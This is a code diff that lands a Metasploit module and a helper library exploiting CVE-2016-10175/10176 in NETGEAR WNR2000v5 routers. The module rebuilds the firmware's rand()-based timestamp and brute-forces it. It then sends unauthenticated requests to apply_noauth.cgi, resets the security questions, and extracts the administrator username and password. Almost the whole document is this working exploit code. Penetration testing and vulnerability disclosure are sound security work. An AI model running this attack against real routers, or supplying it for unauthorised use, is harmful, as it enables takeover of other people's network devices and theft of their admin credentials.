Land rapid7#7778, RCE on Netgear WNR2000v5

Author: wwebb-r7

lib/msf/core/auxiliary/crand.rb

@@ -0,0 +1,113 @@
+module Msf
+
+###
+#
+# This module provides a complete port of the libc rand() and srand() functions.
+# It is used by the NETGEAR WNR2000v5 auxiliary and exploit modules, but might
+# be useful for any other module that needs to emulate C's random number generator.
+#
+# Author: Pedro Ribeiro ([email protected]) / Agile Information Security
+#
+###
+module Auxiliary::CRand
+
+  attr_accessor :randtbl
+  attr_accessor :unsafe_state
+
+####################
+# ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
+# and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c
+
+  TYPE_3 = 3
+  BREAK_3 = 128
+  DEG_3 = 31
+  SEP_3 = 3
+
+  def initialize(info = {})
+    super
+    
+    @randtbl =
+    [
+      # we omit TYPE_3 from here, not needed
+      -1726662223, 379960547, 1735697613, 1040273694, 1313901226,
+      1627687941, -179304937, -2073333483, 1780058412, -1989503057,
+      -615974602, 344556628, 939512070, -1249116260, 1507946756,
+      -812545463, 154635395, 1388815473, -1926676823, 525320961,
+      -1009028674, 968117788, -123449607, 1284210865, 435012392,
+      -2017506339, -911064859, -370259173, 1132637927, 1398500161,
+      -205601318,
+    ]
+
+    @unsafe_state = { 
+      "fptr" => SEP_3,
+      "rptr" => 0,
+      "state" => 0,
+      "rand_type" => TYPE_3,
+      "rand_deg" => DEG_3,
+      "rand_sep" => SEP_3,
+      "end_ptr" => DEG_3
+    }
+  end
+
+  # Emulate the behaviour of C's srand
+  def srandom_r (seed)
+    state = @randtbl
+    if seed == 0
+      seed = 1
+    end
+    state[0] = seed
+    
+    dst = 0
+    word = seed
+    kc = DEG_3
+    for i in 1..(kc-1)
+      hi = word / 127773
+      lo = word % 127773
+      word = 16807 * lo - 2836 * hi
+      if (word < 0)
+        word += 2147483647
+      end
+      dst += 1
+      state[dst] = word
+    end
+    
+    @unsafe_state['fptr'] = @unsafe_state['rand_sep']
+    @unsafe_state['rptr'] = 0
+    
+    kc *= 10
+    kc -= 1
+    while (kc >= 0)
+      random_r
+      kc -= 1
+    end
+  end
+    
+  # Emulate the behaviour of C's rand  
+  def random_r
+    buf = @unsafe_state
+    state = buf['state']
+    
+    fptr = buf['fptr']
+    rptr = buf['rptr']
+    end_ptr = buf['end_ptr']
+    val = @randtbl[fptr] += @randtbl[rptr]
+    
+    result = (val >> 1) & 0x7fffffff
+    fptr += 1
+    if (fptr >= end_ptr)
+      fptr = state
+      rptr += 1
+    else
+      rptr += 1
+      if (rptr >= end_ptr)
+        rptr = state
+      end
+    end
+    buf['fptr'] = fptr
+    buf['rptr'] = rptr
+    
+    result
+  end
+
+end
+end

lib/msf/core/auxiliary/mixins.rb

@@ -4,6 +4,7 @@
 # Auxiliary mixins
 #
 require 'msf/core/auxiliary/auth_brute'
+require 'msf/core/auxiliary/crand'
 require 'msf/core/auxiliary/dos'
 require 'msf/core/auxiliary/drdos'
 require 'msf/core/auxiliary/fuzzer'

modules/auxiliary/admin/http/netgear_wnr2000_pass_recovery.rb

@@ -0,0 +1,261 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'time'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CRand
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NETGEAR WNR2000v5 Administrator Password Recovery',
+      'Description' => %q{
+        The NETGEAR WNR2000 router has a vulnerability in the way it handles password recovery.
+        This vulnerability can be exploited by an unauthenticated attacker who is able to guess
+        the value of a certain timestamp which is in the configuration of the router.
+        Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but
+        it is guaranteed that it can be bruteforced.
+        This module works very reliably and it has been tested with the WNR2000v5, firmware versions
+        1.0.0.34 and 1.0.0.18. It should also work with the hardware revisions v4 and v3, but this
+        has not been tested.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-10175'],
+          ['CVE', '2016-10176'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
+          ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
+        ],
+      'DisclosureDate'  => 'Dec 20 2016'))
+    register_options(
+      [
+        Opt::RPORT(80)
+      ], self.class)
+    register_advanced_options(
+      [
+        OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
+        OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting through', 200])
+      ], self.class)
+  end
+
+  def get_current_time
+    res = send_request_cgi({
+      'uri'     => '/',
+      'method'  => 'GET'
+    })
+    if res && res['Date']
+      date = res['Date']
+      return Time.parse(date).strftime('%s').to_i
+    end
+  end
+
+  # Do some crazyness to force Ruby to cast to a single-precision float and
+  # back to an integer.
+  # This emulates the behaviour of the soft-fp library and the float cast
+  # which is done at the end of Netgear's timestamp generator.
+  def ieee754_round (number)
+    [number].pack('f').unpack('f*')[0].to_i
+  end
+
+
+  # This is the actual algorithm used in the get_timestamp function in
+  # the Netgear firmware.
+  def get_timestamp(time)
+    srandom_r time
+    t0 = random_r
+    t1 = 0x17dc65df;
+    hi = (t0 * t1) >> 32;
+    t2 = t0 >> 31;
+    t3 = hi >> 23;
+    t3 = t3 - t2;
+    t4 = t3 * 0x55d4a80;
+    t0 = t0 - t4;
+    t0 = t0 + 0x989680;
+
+    ieee754_round(t0)
+  end
+
+  def get_creds
+    res = send_request_cgi({
+      'uri'     => '/BRS_netgear_success.html',
+      'method'  => 'GET'
+    })
+    if res && res.body =~ /var sn="([\w]*)";/
+      serial = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to obtain serial number, bailing out...")
+    end
+
+    # 1: send serial number
+    send_request_cgi({
+      'uri'     => '/apply_noauth.cgi?/unauth.cgi',
+      'method'  => 'POST',
+      'Content-Type' => 'application/x-www-form-urlencoded',
+      'vars_post' =>
+      {
+        'submit_flag' => 'match_sn',
+        'serial_num'  => serial,
+        'continue'    => '+Continue+'
+      }
+    })
+
+    # 2: send answer to secret questions
+    send_request_cgi({
+      'uri'     => '/apply_noauth.cgi?/securityquestions.cgi',
+      'method'  => 'POST',
+      'Content-Type' => 'application/x-www-form-urlencoded',
+      'vars_post' =>
+      {
+        'submit_flag' => 'security_question',
+        'answer1'     => @q1,
+        'answer2'     => @q2,
+        'continue'    => '+Continue+'
+      }
+    })
+
+    # 3: PROFIT!!!
+    res = send_request_cgi({
+      'uri'     => '/passwordrecovered.cgi',
+      'method'  => 'GET'
+    })
+
+    if res && res.body =~ /Admin Password: (.*)<\/TD>/
+      password = $1
+      if password.blank?
+        fail_with(Failure::Unknown, "#{peer} - Failed to obtain password! Perhaps security questions were already set?")
+      end
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to obtain password")
+    end
+
+    if res && res.body =~ /Admin Username: (.*)<\/TD>/
+      username = $1
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to obtain username")
+    end
+
+    return [username, password]
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: 'netgear',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+  def send_req(timestamp)
+    begin
+      uri_str = (timestamp == nil ? \
+        "/apply_noauth.cgi?/PWD_password.htm" : \
+        "/apply_noauth.cgi?/PWD_password.htm%20timestamp=#{timestamp.to_s}")
+      res = send_request_raw({
+          'uri'     => uri_str,
+          'method'  => 'POST',
+          'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
+          'data'    => "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=#{@q1}&question2=2&answer2=#{@q2}"
+      })
+      return res
+    rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      return
+    end
+  end
+
+  def run
+    # generate the security questions
+    @q1 = Rex::Text.rand_text_alpha(rand(20) + 2)
+    @q2 = Rex::Text.rand_text_alpha(rand(20) + 2)
+
+    # let's try without timestamp first (the timestamp only gets set if the user visited the page before)
+    print_status("#{peer} - Trying the easy way out first")
+    res = send_req(nil)
+    if res && res.code == 200
+      credentials = get_creds
+      print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
+      return
+    end
+
+    # no result? let's just go on and bruteforce the timestamp
+    print_bad("#{peer} - Well that didn't work... let's do it the hard way.")
+
+    # get the current date from the router and parse it
+    end_time = get_current_time
+    if end_time == nil
+      fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
+    end
+    if end_time <= datastore['TIME_OFFSET']
+      start_time = 0
+    else
+      start_time = end_time - datastore['TIME_OFFSET']
+    end
+    end_time += datastore['TIME_SURPLUS']
+
+    if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
+      end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
+    end
+
+    print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
+    print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")
+
+    # work back from the current router time minus datastore['TIME_OFFSET']
+    while true
+      for time in end_time.downto(start_time)
+        timestamp = get_timestamp(time)
+        sleep 0.1
+        if time % 400 == 0
+          print_status("#{peer} - Still working, trying time #{time}")
+        end
+        res = send_req(timestamp)
+        if res && res.code == 200
+          credentials = get_creds
+          print_good("#{peer} - Success! Got admin username \"#{credentials[0]}\" and password \"#{credentials[1]}\"")
+          report_cred({ 'user' => credentials[0], 'password' => credentials[1] })
+          return
+        end
+      end
+      end_time = start_time
+      start_time -= datastore['TIME_OFFSET']
+      if start_time < 0
+        if end_time <= datastore['TIME_OFFSET']
+          fail_with(Failure::Unknown, "#{peer} - Exploit failed.")
+        end
+        start_time = 0
+      end
+      print_status("#{peer} - Going for another round, finishing at #{start_time} and starting at #{end_time}")
+
+      # let the router clear the buffers a bit...
+      sleep 30
+    end
+  end
+end